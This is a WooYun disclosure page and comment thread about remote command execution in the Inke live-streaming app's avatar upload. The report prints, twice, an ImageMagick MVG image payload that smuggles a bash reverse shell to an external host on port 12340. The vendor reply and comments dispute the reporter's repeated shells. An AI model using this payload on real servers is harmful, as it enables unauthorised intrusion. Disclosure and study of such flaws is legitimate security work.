当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0205910

漏洞标题:映客直播APP存在命令执行(多台服务器)

相关厂商:ingkee.com

漏洞作者: 头晕脑壳疼

提交时间:2016-05-07 10:54

修复时间:2016-06-22 21:50

公开时间:2016-06-22 21:50

漏洞类型:命令执行

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2016-05-07: 细节已通知厂商并且等待厂商处理中
2016-05-08: 厂商已经确认,细节仅向厂商公开
2016-05-18: 细节向核心白帽子及相关领域专家公开
2016-05-28: 细节向普通白帽子公开
2016-06-07: 细节向实习白帽子公开
2016-06-22: 细节向公众公开

简要描述:

详细说明:

app头像上传处
传一张图抓包
把图片的内容改为
push graphic-context
viewbox 0 0 640 480
fill 'url(https://example.com/image.jpg"|bash -i >& /dev/tcp/外网服务器ip/12340 0>&1")'
pop graphic-context

1.png


服务器监听12340端口

2.png


3.png


没监听一次就会有一个不同的ip

漏洞证明:

app头像上传处
传一张图抓包
把图片的内容改为
push graphic-context
viewbox 0 0 640 480
fill 'url(https://example.com/image.jpg"|bash -i >& /dev/tcp/外网服务器ip/12340 0>&1")'
pop graphic-context

1.png


服务器监听12340端口

2.png


3.png


没监听一次就会有一个不同的ip

修复方案:

版权声明:转载请注明来源 头晕脑壳疼@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2016-05-08 21:48

厂商回复:

感谢关注映客安全。这个漏洞我们之前已经了解并且处理。在处理过程中小伙子就在各种反弹shell,我们处理了反弹连接后还不死心继续弹数十次。小伙子想干啥?大半夜的让不让人睡觉了?抓到打死,不死也要残废。

最新状态:

暂无

漏洞评价:

评价

  1. 2016-05-08 22:09 | 随风的风 ( 普通白帽子 | Rank:257 漏洞数:95 | 微信公众号:233sec 不定期分享各种漏洞思...)

    @ingkee.com@映客直播 建议直接找管理员吧。。。各种反弹shell。。。

  2. 2016-05-08 22:16 | 映客直播(乌云厂商)

    @随风的风 现在还能反弹? 如果可以反弹 留个联系方式,可否?

  3. 2016-05-08 22:19 | 随风的风 ( 普通白帽子 | Rank:257 漏洞数:95 | 微信公众号:233sec 不定期分享各种漏洞思...)

    @映客直播 不是这个意思。。我是指这个白帽有点过了。。懂否?

  4. 2016-05-08 22:31 | 头晕脑壳疼 ( 普通白帽子 | Rank:858 漏洞数:167 )

    我提交后没有反弹过,谢谢

  5. 2016-05-08 23:07 | 头晕脑壳疼 ( 普通白帽子 | Rank:858 漏洞数:167 )

    @随风的风 你怎么知道是我,睁眼瞎?你怎么知道不是我提交后别人就没有测试?

  6. 2016-05-09 00:41 | mango ( 核心白帽子 | Rank:2165 漏洞数:312 | 解决问题的第一步,是要承认问题的存在。)

    @头晕脑壳疼 你直接让它把日志搬出来呗~@映客直播 搬出来不就好了么~

  7. 2016-05-09 00:52 | Q1NG ( 普通白帽子 | Rank:148 漏洞数:27 | 临 兵 斗 者 皆 阵 列 前 行 !)

    抓起来,弹JJ弹到死,让那个家伙再弹, ^_^

  8. 2016-05-09 06:33 | 黑色键盘丶 ( 普通白帽子 | Rank:2260 漏洞数:489 | 哥,是孤独风中的一匹狼)

    @头晕脑壳疼 以为你被打死了 群里不见人影

  9. 2016-05-09 10:11 | Sevck ( 路人 | Rank:2 漏洞数:2 )

    白帽子这么做就不地道了吧

  10. 2016-05-09 10:32 | A lonely heart孤心 ( 路人 | Rank:10 漏洞数:4 | 技术不分年龄,只分高低!)

    @映客直播 抓到要被打死,哈哈哈,我可不敢搞眏客,会被打死

  11. 2016-05-09 10:33 | Mujj ( 实习白帽子 | Rank:58 漏洞数:4 | 乌云指定IDC)

    前排占位广告Krypt机房云服务器双倍内存和硬盘,2GB内存云服务器只要¥99http://www.80host.com/cloud.html

  12. 2016-05-09 10:34 | 屠夫 ( 路人 | Rank:8 漏洞数:3 | 乌云最帅的白帽子)

    @映客直播 看到映客的漏洞 以后要绕道走 抓到会被打死

  13. 2016-05-09 10:40 | 玄道 ( 普通白帽子 | Rank:142 漏洞数:42 | 就是注入 就是注入 注入)

    吓得我映客的漏洞都不敢挖了 怕被打死

  14. 2016-05-09 10:51 | 红客十年 ( 普通白帽子 | Rank:392 漏洞数:80 | 去年离职富士康,回到家中上蓝翔,蓝翔毕业...)

    吓得我映客的漏洞都不敢挖了 怕被打残废

  15. 2016-05-09 10:59 | little_bird ( 路人 | Rank:1 漏洞数:1 | 低调求发展)

    吓得我映客的漏洞都不敢挖了 怕被打残废

  16. 2016-05-09 11:49 | 纽伊斯特 ( 路人 | Rank:8 漏洞数:4 | 有的人活着,他已经死了。)

    吓得我映客的漏洞都不敢挖了 怕被打残废

  17. 2016-05-09 11:50 | Lykan算什么 ( 路人 | Rank:6 漏洞数:2 | 这家伙太叼,什么都没有留下。)

    吓得我映客的漏洞都不敢挖了 怕被打残废

  18. 2016-05-09 12:36 | 0h1in9e ( 实习白帽子 | Rank:68 漏洞数:23 | 林歌 | 峨眉山下修炼中的<网络安全></web开...)

    卧槽!这个漏洞因为厂家一句话火了,传遍了黑客群。。。

  19. 2016-05-09 12:54 | 1c3z ( 普通白帽子 | Rank:307 漏洞数:64 | @)!^)

    恭喜吸引了一波仇恨。

  20. 2016-05-09 15:02 | ze0r ( 路人 | Rank:0 漏洞数:1 | ..)

    @头晕脑壳疼 你可知道,你这标题,让多少人本来不知道哪里有漏洞的,也知道那里有漏洞了,你确定你是在做好事?你这标题,在厂商未回应之前,知道吸引了多少人搞映客吗?

  21. 2016-05-09 20:48 | A lonely heart孤心 ( 路人 | Rank:10 漏洞数:4 | 技术不分年龄,只分高低!)

    @红客十年 我也是醉了,抓到直接打死,不需要我同意!

  22. 2016-05-10 14:56 | waking-云狐 ( 实习白帽子 | Rank:34 漏洞数:5 | WAKINGTEAM 深圳智可网络科技有限公司)

    吓得我映客的漏洞都不敢挖了 怕被打残废

  23. 2016-05-10 15:46 | 达子 ( 路人 | Rank:6 漏洞数:3 | 寒冷到了极致,太阳就要光临)

    小伙子不要被抓到啊

  24. 2016-05-11 07:39 | A lonely heart孤心 ( 路人 | Rank:10 漏洞数:4 | 技术不分年龄,只分高低!)

    @红客十年 加我好友!!

  25. 2016-05-14 13:54 | 帅气的王尼玛 ( 路人 | Rank:2 漏洞数:1 | 没什么好介绍的)

    哈哈哈哈抓到打到死可以可以厂商真牛逼,怎么能打到死他这么喜欢弹应该弹JJ到死QAQ